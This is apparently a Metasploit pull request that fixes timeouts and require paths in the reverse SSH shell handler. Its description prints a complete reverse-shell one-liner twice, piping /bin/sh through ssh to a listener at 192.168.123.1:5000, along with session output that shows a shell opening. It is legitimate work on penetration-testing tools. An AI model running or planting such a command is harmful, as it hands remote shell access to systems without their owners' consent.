### PR TITLE
Fix broken reverse ssh command shell

### DIFF
--- a/lib/msf/base/sessions/meterpreter.rb
+++ b/lib/msf/base/sessions/meterpreter.rb
@@ -259,11 +259,10 @@ class Meterpreter < Rex::Post::Meterpreter::Client
     @shell = nil
   end
 
-  def shell_command(cmd)
+  def shell_command(cmd, timeout = 5)
     # Send the shell channel's stdin.
     shell_write(cmd + "\n")
 
-    timeout = 5
     etime = ::Time.now.to_f + timeout
     buff = ""
 

--- a/lib/msf/base/sessions/ssh_command_shell_reverse.rb
+++ b/lib/msf/base/sessions/ssh_command_shell_reverse.rb
@@ -31,20 +31,19 @@ module Msf::Sessions
       'SSH command shell'
     end
 
-    def shell_command(cmd)
+    def shell_command(cmd, timeout = 5)
       # Send the command to the session's stdin.
       shell_write(cmd + "\n")
 
-      timeo = 0.5
-      etime = ::Time.now.to_f + timeo
-      buff = ''
+      etime = ::Time.now.to_f + timeout
+      buff = ""
 
       # Keep reading data until no more data is available or the timeout is
       # reached.
-      while ((::Time.now.to_f < etime) && ::IO.select([rstream.fd_rd], nil, nil, timeo))
+      while ::Time.now.to_f < etime && ::IO.select([rstream.fd_rd], nil, nil, timeout)
         res = shell_read(-1, 0.01)
         buff << res if res
-        timeo = etime - ::Time.now.to_f
+        timeout = etime - ::Time.now.to_f
       end
 
       buff

--- a/lib/msf/core/handler/reverse_ssh.rb
+++ b/lib/msf/core/handler/reverse_ssh.rb
@@ -103,7 +103,7 @@ module Msf
       end
 
       def init_fd_client(cli)
-        Timeout.timeout(5) do
+        Timeout.timeout(25) do
           sleep 0.02 while cli.connection.open_channel_keys.empty?
           fdc = Rex::Proto::Ssh::ChannelFD.new(cli)
           service.clients.push(fdc)

--- a/lib/rex/proto/ssh/server.rb
+++ b/lib/rex/proto/ssh/server.rb
@@ -17,7 +17,7 @@ module ServerClient
     # Ssh relies on PTY not available on Windows, limiting the `require` here
     # ensures eager_load patterns from zeitwerk will not attempt to load `hrr_rb_ssh`
     # during startup.
-    require 'connection'
+    require 'rex/proto/ssh/connection'
     @server          = server
     @connection      = Rex::Proto::Ssh::Connection.new(
       self, server.server_options.merge(ssh_server: server), server.context
@@ -205,7 +205,7 @@ protected
   # ensures eager_load patterns from zeitwerk will not attempt to load `hrr_rb_ssh`
   # during startup.
   def default_options
-    require 'connection'
+    require 'rex/proto/ssh/connection'
     Ssh::Connection.default_options
   rescue LoadError => e
     wlog(e)


### PR DESCRIPTION
### Before

The ssh client connects:
```
rm -rf /tmp/tqld ; mkfifo /tmp/tqld;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 192.168.123.1 -p 5000 0</tmp/tqld|/bin/sh >/t
mp/tqld 2>&1;rm /tmp/tqld
```

The msf handler hangs without any connection:
```
[*] Using configured payload cmd/unix/reverse_ssh
[*] Started SSH reverse handler on ssh://192.168.123.1:5000

```

### After

The ssh client connects:
```
rm -rf /tmp/tqld ; mkfifo /tmp/tqld;ssh -qq -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no 192.168.123.1 -p 5000 0</tmp/tqld|/bin/sh >/t
mp/tqld 2>&1;rm /tmp/tqld
```

The shell opens:
```
[*] Using configured payload cmd/unix/reverse_ssh
[*] Started SSH reverse handler on ssh://192.168.123.1:5000
[*] SSH command shell session 1 opened (127.0.0.1 -> 127.0.0.1) at 2022-08-04 14:46:55 +0100

whoami
test_user

```

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use cmd/unix/reverse_ssh)`
- [ ] Generate the payload
- [ ] Create a handler
- [ ] Verify the payload opens a session, and that it can be interacted with